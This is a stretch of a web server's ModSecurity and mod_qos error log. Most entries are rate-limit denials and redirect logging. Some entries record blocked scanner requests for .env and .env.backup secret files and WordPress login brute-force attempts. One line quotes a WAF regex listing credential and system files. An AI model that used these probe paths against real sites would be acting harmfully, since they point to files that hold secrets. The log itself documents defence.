[Tue May 26 20:00:19.322983 2026] [security2:error] [pid 106517:tid 106734] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWueoZZc2DoU1lPnP1cvAAAANg"]
[Tue May 26 20:00:19.325201 2026] [security2:error] [pid 106517:tid 106751] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWueoZZc2DoU1lPnP1cswAAAOk"]
[Tue May 26 20:00:19.327762 2026] [security2:error] [pid 93576:tid 93778] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuemDRMqfxdEDkoswAAgAAAEI"]
[Tue May 26 20:00:19.336767 2026] [security2:error] [pid 106517:tid 106687] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWueoZZc2DoU1lPnP1cvQAAAKk"]
[Tue May 26 20:00:19.340374 2026] [security2:error] [pid 93576:tid 93770] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuemDRMqfxdEDkoswAEwAAADo"]
[Tue May 26 20:00:19.340800 2026] [security2:error] [pid 93576:tid 93738] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuemDRMqfxdEDkosz_7gAAABo"]
[Tue May 26 20:00:19.351029 2026] [security2:error] [pid 106517:tid 106709] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWueoZZc2DoU1lPnP1cxwAAAL8"]
[Tue May 26 20:00:19.352924 2026] [security2:error] [pid 106517:tid 106711] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWueoZZc2DoU1lPnP1csgAAAME"]
[Tue May 26 20:00:19.353751 2026] [security2:error] [pid 93576:tid 93730] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuemDRMqfxdEDkoswABgAAABI"]
[Tue May 26 20:00:19.354247 2026] [security2:error] [pid 93576:tid 93766] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuemDRMqfxdEDkoswAEQAAADY"]
[Tue May 26 20:00:19.355195 2026] [security2:error] [pid 106517:tid 106721] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWueoZZc2DoU1lPnP1cuwAAAMs"]
[Tue May 26 20:00:19.357201 2026] [security2:error] [pid 106517:tid 106732] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWueoZZc2DoU1lPnP1cugAAANY"]
[Tue May 26 20:00:19.361176 2026] [security2:error] [pid 106517:tid 106702] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWueoZZc2DoU1lPnP1cyAAAALg"]
[Tue May 26 20:00:19.361784 2026] [security2:error] [pid 106517:tid 106754] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWueoZZc2DoU1lPnP1c3QAAAOw"]
[Tue May 26 20:00:19.365803 2026] [security2:error] [pid 106517:tid 106685] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWueoZZc2DoU1lPnP1c5AAAAKc"]
[Tue May 26 20:00:19.366377 2026] [security2:error] [pid 106517:tid 106729] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWueoZZc2DoU1lPnP1crgAAANM"]
[Tue May 26 20:00:19.389872 2026] [security2:error] [pid 106517:tid 106777] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWueoZZc2DoU1lPnP1c3AAAAQM"]
[Tue May 26 20:00:19.390144 2026] [security2:error] [pid 106517:tid 106657] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWueoZZc2DoU1lPnP1ctQAAAIw"]
[Tue May 26 20:00:19.395423 2026] [security2:error] [pid 106517:tid 106765] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWueoZZc2DoU1lPnP1c1AAAAPc"]
[Tue May 26 20:00:19.396462 2026] [security2:error] [pid 106517:tid 106718] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWueoZZc2DoU1lPnP1c7AAAAMg"]
[Tue May 26 20:00:19.401977 2026] [security2:error] [pid 106517:tid 106659] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWueoZZc2DoU1lPnP1c2wAAAI4"]
[Tue May 26 20:00:19.413943 2026] [security2:error] [pid 93576:tid 93710] [remote 45.148.10.62:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.ndequipments.com"] [uri "/backend/.env"] [unique_id "ahWue2DRMqfxdEDkoswAlwAAEX8"]
[Tue May 26 20:00:19.418916 2026] [security2:error] [pid 93576:tid 93791] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuemDRMqfxdEDkoswABQAAAE8"]
[Tue May 26 20:00:19.429604 2026] [security2:error] [pid 106517:tid 106676] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWueoZZc2DoU1lPnP1c8AAAAJ8"]
[Tue May 26 20:00:19.431927 2026] [security2:error] [pid 93576:tid 93789] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuemDRMqfxdEDkoswAIQAAAE0"]
[Tue May 26 20:00:19.442769 2026] [security2:error] [pid 106517:tid 106744] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWueoZZc2DoU1lPnP1c7gAAAOI"]
[Tue May 26 20:00:19.519006 2026] [security2:error] [pid 106517:tid 106638] [remote 119.18.52.246:42470] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.52.18.119.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWue4ZZc2DoU1lPnP1dMAAAj3Y"]
[Tue May 26 20:00:19.538863 2026] [qos:error] [pid 93576:tid 93737] [client 45.148.10.120:34990] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWue2DRMqfxdEDkoswAvQAAABk
[Tue May 26 20:00:19.544395 2026] [qos:error] [pid 93576:tid 93753] [client 45.148.10.120:58080] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWue2DRMqfxdEDkoswAvgAAACk
[Tue May 26 20:00:19.545681 2026] [qos:error] [pid 93576:tid 93729] [client 45.148.10.120:57890] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWue2DRMqfxdEDkoswAvwAAABE
[Tue May 26 20:00:19.548640 2026] [qos:error] [pid 93576:tid 93791] [client 45.148.10.120:34960] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWue2DRMqfxdEDkoswAwAAAAE8
[Tue May 26 20:00:19.553661 2026] [qos:error] [pid 93576:tid 93798] [client 45.148.10.120:35140] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWue2DRMqfxdEDkoswAwQAAAFY
[Tue May 26 20:00:19.573974 2026] [qos:error] [pid 93576:tid 93754] [client 45.148.10.120:35306] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWue2DRMqfxdEDkoswAwgAAACo
[Tue May 26 20:00:19.579954 2026] [qos:error] [pid 106517:tid 106742] [client 45.148.10.120:57898] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWue4ZZc2DoU1lPnP1dVQAAAOA
[Tue May 26 20:00:19.583526 2026] [qos:error] [pid 93576:tid 93821] [client 45.148.10.120:55364] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWue2DRMqfxdEDkoswAwwAAAG0
[Tue May 26 20:00:19.598876 2026] [qos:error] [pid 93576:tid 93736] [client 45.148.10.120:35006] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWue2DRMqfxdEDkoswAxAAAABg
[Tue May 26 20:00:19.640908 2026] [security2:error] [pid 106517:tid 106640] [remote 45.148.10.62:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.ndequipments.com"] [uri "/test.php"] [unique_id "ahWue4ZZc2DoU1lPnP1dVgAAk3g"]
[Tue May 26 20:00:19.682773 2026] [security2:error] [pid 93576:tid 93753] [client 103.163.220.48:43987] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/plugins/"] [unique_id "ahWue2DRMqfxdEDkoswAxwAAACk"]
[Tue May 26 20:00:19.686582 2026] [qos:error] [pid 93576:tid 93729] [client 45.148.10.120:34990] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWue2DRMqfxdEDkoswAyAAAABE
[Tue May 26 20:00:19.695877 2026] [qos:error] [pid 93576:tid 93791] [client 45.148.10.120:58080] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWue2DRMqfxdEDkoswAyQAAAE8
[Tue May 26 20:00:19.700794 2026] [qos:error] [pid 93576:tid 93798] [client 45.148.10.120:34960] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWue2DRMqfxdEDkoswAygAAAFY
[Tue May 26 20:00:19.702335 2026] [qos:error] [pid 93576:tid 93754] [client 45.148.10.120:57890] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWue2DRMqfxdEDkoswAywAAACo
[Tue May 26 20:00:19.703824 2026] [qos:error] [pid 93576:tid 93821] [client 45.148.10.120:35140] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWue2DRMqfxdEDkoswAzAAAAG0
[Tue May 26 20:00:19.727533 2026] [qos:error] [pid 106517:tid 106698] [client 45.148.10.120:57898] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWue4ZZc2DoU1lPnP1dWAAAALQ
[Tue May 26 20:00:19.731415 2026] [qos:error] [pid 93576:tid 93719] [client 45.148.10.120:35306] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWue2DRMqfxdEDkoswAzQAAAAc
[Tue May 26 20:00:19.732844 2026] [qos:error] [pid 93576:tid 93762] [client 45.148.10.120:55364] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWue2DRMqfxdEDkoswAzgAAADI
[Tue May 26 20:00:19.750460 2026] [qos:error] [pid 93576:tid 93792] [client 45.148.10.120:35006] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWue2DRMqfxdEDkoswAzwAAAFA
[Tue May 26 20:00:19.787083 2026] [qos:error] [pid 93576:tid 93820] [client 45.148.10.120:46670] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWue2DRMqfxdEDkoswA0AAAAGw
[Tue May 26 20:00:19.834438 2026] [qos:error] [pid 93576:tid 93737] [client 45.148.10.120:34990] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWue2DRMqfxdEDkoswA0gAAABk
[Tue May 26 20:00:19.849836 2026] [qos:error] [pid 93576:tid 93729] [client 45.148.10.120:58080] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWue2DRMqfxdEDkoswA1AAAABE
[Tue May 26 20:00:19.849903 2026] [qos:error] [pid 93576:tid 93791] [client 45.148.10.120:57890] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWue2DRMqfxdEDkoswA1QAAAE8
[Tue May 26 20:00:19.850945 2026] [security2:error] [pid 93576:tid 93713] [client 45.148.10.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.ndequipments.com"] [uri "/index.php"] [unique_id "ahWue2DRMqfxdEDkoswA0QAAAVw"]
[Tue May 26 20:00:19.853165 2026] [qos:error] [pid 93576:tid 93754] [client 45.148.10.120:35140] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWue2DRMqfxdEDkoswA1gAAACo
[Tue May 26 20:00:19.882041 2026] [qos:error] [pid 93576:tid 93745] [client 45.148.10.120:55364] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWue2DRMqfxdEDkoswA2AAAACE
[Tue May 26 20:00:19.975073 2026] [qos:error] [pid 106517:tid 106732] [client 45.148.10.120:57898] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWue4ZZc2DoU1lPnP1dXwAAANY
[Tue May 26 20:00:19.975694 2026] [qos:error] [pid 93576:tid 93741] [client 45.148.10.120:46670] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWue2DRMqfxdEDkoswA3QAAAB0
[Tue May 26 20:00:19.978270 2026] [qos:error] [pid 93576:tid 93739] [client 45.148.10.120:35006] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWue2DRMqfxdEDkoswA3wAAABs
[Tue May 26 20:00:19.983150 2026] [qos:error] [pid 93576:tid 93755] [client 45.148.10.120:34990] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWue2DRMqfxdEDkoswA4AAAACs
[Tue May 26 20:00:19.999021 2026] [qos:error] [pid 93576:tid 93814] [client 45.148.10.120:57890] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWue2DRMqfxdEDkoswA4QAAAGY
[Tue May 26 20:00:20.002365 2026] [qos:error] [pid 93576:tid 93816] [client 45.148.10.120:35140] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWufGDRMqfxdEDkoswA4gAAAGg
[Tue May 26 20:00:20.004909 2026] [qos:error] [pid 93576:tid 93737] [client 45.148.10.120:58080] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWufGDRMqfxdEDkoswA4wAAABk
[Tue May 26 20:00:20.031855 2026] [qos:error] [pid 93576:tid 93729] [client 45.148.10.120:55364] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWufGDRMqfxdEDkoswA5QAAABE
[Tue May 26 20:00:20.061029 2026] [security2:error] [pid 106517:tid 106745] [client 45.148.10.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWufIZZc2DoU1lPnP1dYQAA438"], referer: https://www.ndequipments.com/.env.staging
[Tue May 26 20:00:20.123263 2026] [qos:error] [pid 106517:tid 106731] [client 45.148.10.120:57898] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWufIZZc2DoU1lPnP1dZgAAANU
[Tue May 26 20:00:20.123262 2026] [qos:error] [pid 93576:tid 93801] [client 45.148.10.120:46670] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWufGDRMqfxdEDkoswA5gAAAFk
[Tue May 26 20:00:20.129690 2026] [qos:error] [pid 93576:tid 93736] [client 45.148.10.120:35006] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWufGDRMqfxdEDkoswA5wAAABg
[Tue May 26 20:00:20.131476 2026] [qos:error] [pid 93576:tid 93745] [client 45.148.10.120:34990] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWufGDRMqfxdEDkoswA6AAAACE
[Tue May 26 20:00:20.147066 2026] [qos:error] [pid 93576:tid 93800] [client 45.148.10.120:57890] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWufGDRMqfxdEDkoswA6QAAAFg
[Tue May 26 20:00:20.156382 2026] [qos:error] [pid 93576:tid 93809] [client 45.148.10.120:46682] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWufGDRMqfxdEDkoswA6gAAAGE
[Tue May 26 20:00:20.160296 2026] [qos:error] [pid 93576:tid 93836] [client 45.148.10.120:58080] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWufGDRMqfxdEDkoswA6wAAAHw
[Tue May 26 20:00:20.161041 2026] [qos:error] [pid 93576:tid 93789] [client 45.148.10.120:35140] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWufGDRMqfxdEDkoswA7AAAAE0
[Tue May 26 20:00:20.172210 2026] [security2:error] [pid 106517:tid 106772] [client 103.163.220.55:20047] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-admin/js/widgets/maint/"] [unique_id "ahWufIZZc2DoU1lPnP1daQAAAP4"]
[Tue May 26 20:00:20.211499 2026] [qos:error] [pid 106517:tid 106696] [client 45.148.10.120:46692] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWufIZZc2DoU1lPnP1dagAAALI
[Tue May 26 20:00:20.229269 2026] [security2:error] [pid 106517:tid 106600] [remote 45.148.10.62:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.ndequipments.com"] [uri "/.env.backup"] [unique_id "ahWufIZZc2DoU1lPnP1dbAAAjFA"]
[Tue May 26 20:00:20.250234 2026] [qos:error] [pid 93576:tid 93820] [client 45.148.10.120:55364] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWufGDRMqfxdEDkoswA7gAAAGw
[Tue May 26 20:00:20.270378 2026] [qos:error] [pid 93576:tid 93739] [client 45.148.10.120:46670] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWufGDRMqfxdEDkoswA8QAAABs
[Tue May 26 20:00:20.270883 2026] [qos:error] [pid 106517:tid 106771] [client 45.148.10.120:57898] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWufIZZc2DoU1lPnP1dbgAAAP0
[Tue May 26 20:00:20.274932 2026] [security2:error] [pid 106517:tid 106737] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWueoZZc2DoU1lPnP1c9AAAANs"]
[Tue May 26 20:00:20.276420 2026] [security2:error] [pid 93576:tid 93727] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuemDRMqfxdEDkoswAIgAAAA8"]
[Tue May 26 20:00:20.277899 2026] [security2:error] [pid 93576:tid 93825] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuemDRMqfxdEDkoswAIwAAAHE"]
[Tue May 26 20:00:20.287484 2026] [security2:error] [pid 93576:tid 93735] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWue2DRMqfxdEDkoswAjQAAABc"]
[Tue May 26 20:00:20.293317 2026] [security2:error] [pid 93576:tid 93744] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuemDRMqfxdEDkoswAKgAAACA"]
[Tue May 26 20:00:20.297578 2026] [security2:error] [pid 93576:tid 93812] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuemDRMqfxdEDkoswAKwAAAGQ"]
[Tue May 26 20:00:20.299202 2026] [security2:error] [pid 106517:tid 106707] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWue4ZZc2DoU1lPnP1dMwAAAL0"]
[Tue May 26 20:00:20.301054 2026] [security2:error] [pid 93576:tid 93767] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuemDRMqfxdEDkoswAOQAAADc"]
[Tue May 26 20:00:20.305144 2026] [security2:error] [pid 106517:tid 106704] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWueoZZc2DoU1lPnP1c9wAAALo"]
